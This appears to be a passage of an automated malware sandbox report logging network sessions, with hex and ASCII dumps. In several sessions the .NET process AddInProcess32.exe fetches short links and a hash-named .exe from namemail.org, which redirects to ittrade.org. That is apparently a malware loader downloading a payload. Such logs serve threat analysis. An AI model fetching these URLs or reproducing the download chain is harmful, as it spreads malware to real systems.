                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC1369INData Raw: 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61 69 6e 22 3e 79 69 70 2e 73 75 3c 2f 64 69
                                                                                                                                                                                                                                                            Data Ascii: .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="domain">yip.su</di
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC138INData Raw: 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: ute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            7192.168.2.55556020.114.59.183443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ukzbu+vH1LRx6rZ&MD=mpFDpHgu HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                            MS-CorrelationId: c5e92f46-11df-45b0-8927-e0dc98294ecd
                                                                                                                                                                                                                                                            MS-RequestId: c5322595-e92e-4ed5-80ca-b1601a11cc38
                                                                                                                                                                                                                                                            MS-CV: teMwaG+Go0aV5YWu.0
                                                                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:53 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 24490
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            8192.168.2.555569172.67.200.21944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC62OUTGET /ppg8x HTTP/1.1
                                                                                                                                                                                                                                                            Host: sty.ink
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:54 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6ImMvaFlYb2dlSm8rRG1YVnZ3RVRrMXc9PSIsInZhbHVlIjoiN2xUd0lGak44bkdYQ1pLb3pRVTUzVk10QVdDYVlEdHo1NHhMTUpUNkNIdkhvbHdVczhTZjBoZmJKdmZMTW5VZldzUHRGSFhSS0RkL2dnUURMVkRxUGZCczNLUXN2SklvSTIwN1hxL2VTajhmR2ZnYkdFT1JSMFEycjRoT0hnZTMiLCJtYWMiOiIxMDU0MTA1ZTRlN2M2YjVmZWNiZDQzNWIyODQzZTg0ODYwN2NjMTg2YWJhNWU4NzI2NDEyOWY3ZTdkZDg4OTExIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:54 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6ImZReHEwZUtaZzlPUUR4NjZlRms4ZXc9PSIsInZhbHVlIjoibzliZlpwOEE0YkVmdDk3U2ZCQVNkODkwdys1NGt3aTRkVTdvU3ZLZjdCREZ0TGxuQm96eDRLeXlCWDFXUmlCdmFqVFpFVVBFbUV6cm84NWtoUURKU0ttZnJjUzBvd0YyNk01aHR2WGRZeS9qMkg1Y0hRTG0rSjdaamk0Y0dRa0oiLCJtYWMiOiJiYzAzOWQ1ZmNmNzc2YjhiODg2MDM4NjQ0YzZlOGMxMGMxYTIwOGQ0YWY3YjU2ODU4NjdmMjQxN2I1MjRjOGUzIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:54 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC397INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 5a 4c 6c 6f 53 25 32 46 4d 34 61 45 44 67 72 6e 55 56 63 52 64 38 65 78 51 33 4e 31 45 33 4d 25 32 42 35 6d 62 37 45 4f 4b 6d 49 79 74 77 25 32 46 65 4d 45 6e 67 31 65 46 64 44 72 31 51 4c 77 34 64 58 78 69 76 34 52 33 31 4d 36 6e 33 70 66 63 41 56 65 78 6b 25 32 46 47 74 75 72 41 55 65 53 65 52 43 39 46 77 62 55 6b 78 54 6b 63 73 34 4b 76 51 62 38 64 69 39 4f 66 25 32 46 4e 67 66 70 36 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22
                                                                                                                                                                                                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZLloS%2FM4aEDgrnUVcRd8exQ3N1E3M%2B5mb7EOKmIytw%2FeMEng1eFdDr1QLw4dXxiv4R31M6n3pfcAVexk%2FGturAUeSeRC9FwbUkxTkcs4KvQb8di9Of%2FNgfp6"}],"group":"cf-nel","max_age":604800}NEL: {"
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC1369INData Raw: 65 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 68 2d 31 30 30 20 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 2d 73 6d 6f 6f 74 68 20 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 43 53 52 46 20 54 6f 6b 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                                                                                                                                                                            Data Ascii: e1c<!DOCTYPE html><html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... CSRF Token --> <meta name="csrf-token" content="
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC1369INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 6f 72 74 69 6e 79 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 47 6f 20 62 61 63 6b 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 66 6f 6f 74 65 72 20 69 64 3d 22 66 6f 6f 74 65 72 22 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 20 62 67 2d 62 61 73 65 2d 30 20 64 2d 70 72 69 6e 74 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72
                                                                                                                                                                                                                                                            Data Ascii: <a href="https://shortiny.com" class="btn btn-primary">Go back</a> </div> </div> </div> </div></div> <footer id="footer" class="footer bg-base-0 d-print-none"> <div class="container
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC881INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 69 78 65 64 2d 62 6f 74 74 6f 6d 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 2d 30 20 6d 74 2d 30 20 6d 72 2d 33 20 6d 62 2d 33 20 6d 6c 2d 33 20 70 2d 32 20 72 6f 75 6e 64 65 64 20 63 6f 6f 6b 69 65 2d 62 61 6e 6e 65 72 20
                                                                                                                                                                                                                                                            Data Ascii: </div> </div> </div> <div class="fixed-bottom pointer-events-none"> <div class="d-flex justify-content-center align-items-center"> <div class="border-0 mt-0 mr-3 mb-3 ml-3 p-2 rounded cookie-banner
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            9192.168.2.555570172.67.200.21944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC62OUTGET /ppg8x HTTP/1.1
                                                                                                                                                                                                                                                            Host: sty.ink
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6Ii9lN2kwTDJjVWVwNlFBMDY5TXVCWmc9PSIsInZhbHVlIjoiSVZsenp6OWpENXBCNWVyMkV6MkRYbXhEaG1INFpTOFRvUUtpVzUzV3hIMFEySXJsam5RNXBNdXFkVkI5UkhNS3h1ZU9xcEU3cWk1YXRtcGdaZmpBRU83Yjg5a0ZSdlRzb1BtcXJsYy95T05GNE52U3B1Z1pSOWNLSWpjcUtBQkUiLCJtYWMiOiI4M2IyNDk1YjA5NzgwNzAzNzE5NzQ2NzA4YmI0N2VhZjY3YzlmMjM1M2EyMzZlOWQ4YzdjODI0Njc5ZTUwNjgyIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:55 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6ImZOeFVCMjJaVGhtWmpZaXN1bXN1V2c9PSIsInZhbHVlIjoieVpSeGZyaWhWRXNXeHZNcDF6Q09TbnRRR0o1emFmek5Dc0ZMdGV2QVN3cjdxeVk2MGZoaE1wWWIwTnJxV0NlbTZOcHE4bE9tODRoL0J4ZTZxZnFhaVRwNlJZN09EeXFuMStTbXhXeHAvakVQQXJBbTRXYXVzNUJhZ01taXY0NnAiLCJtYWMiOiI2MWQyMWVmZDQyMDNlYzA3NDI2YjRlZTFjMzczMzYyNmFiOWI2N2I0Y2IwODUyNmRmYjljOWVkZmNiNWQ0MGYxIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:55 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC391INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 41 71 7a 4e 6e 51 58 43 59 57 4f 71 6a 48 49 6b 47 48 67 39 44 31 39 47 39 6c 6f 38 74 62 70 72 63 59 52 53 54 45 63 47 4e 67 51 4f 72 41 25 32 42 53 69 52 35 62 37 72 56 64 5a 64 6d 6e 58 76 70 74 74 49 44 51 54 59 56 67 65 61 7a 4a 67 71 30 25 32 46 76 55 4a 4c 57 51 53 50 41 68 39 41 42 6f 6b 74 48 68 52 45 39 4b 6a 73 34 71 53 33 47 75 6d 4f 7a 46 56 6e 67 6c 57 75 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73
                                                                                                                                                                                                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AqzNnQXCYWOqjHIkGHg9D19G9lo8tbprcYRSTEcGNgQOrA%2BSiR5b7rVdZdmnXvpttIDQTYVgeazJgq0%2FvUJLWQSPAh9ABoktHhRE9Kjs4qS3GumOzFVnglWu"}],"group":"cf-nel","max_age":604800}NEL: {"succes
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC1369INData Raw: 65 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 68 2d 31 30 30 20 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 2d 73 6d 6f 6f 74 68 20 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 43 53 52 46 20 54 6f 6b 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                                                                                                                                                                            Data Ascii: e1c<!DOCTYPE html><html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... CSRF Token --> <meta name="csrf-token" content="
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC1369INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 6f 72 74 69 6e 79 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 47 6f 20 62 61 63 6b 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 66 6f 6f 74 65 72 20 69 64 3d 22 66 6f 6f 74 65 72 22 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 20 62 67 2d 62 61 73 65 2d 30 20 64 2d 70 72 69 6e 74 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72
                                                                                                                                                                                                                                                            Data Ascii: <a href="https://shortiny.com" class="btn btn-primary">Go back</a> </div> </div> </div> </div></div> <footer id="footer" class="footer bg-base-0 d-print-none"> <div class="container
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC881INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 69 78 65 64 2d 62 6f 74 74 6f 6d 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 2d 30 20 6d 74 2d 30 20 6d 72 2d 33 20 6d 62 2d 33 20 6d 6c 2d 33 20 70 2d 32 20 72 6f 75 6e 64 65 64 20 63 6f 6f 6b 69 65 2d 62 61 6e 6e 65 72 20
                                                                                                                                                                                                                                                            Data Ascii: </div> </div> </div> <div class="fixed-bottom pointer-events-none"> <div class="d-flex justify-content-center align-items-center"> <div class="border-0 mt-0 mr-3 mb-3 ml-3 p-2 rounded cookie-banner
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            10192.168.2.555574172.67.178.18344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC98OUTGET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC695INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qj7UHzpM6pwNLwvE%2FENVTfnuYOC%2Fq3EL%2BAJ1lobj7cKQVoYcUyGN%2FYclWPZ1QWjggjd7fpuLEO%2BgQUhSkOXtBO5SS8c3UC%2FPf9IhE%2FCkjaUsBR7GrvfBrMKYrIzpsbQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628200fe9bd0ad3-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC131INData Raw: 37 64 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 74 72 61 64 65 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 7d<a href="https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            11192.168.2.555573172.67.178.18344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC98OUTGET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC681INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:55 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
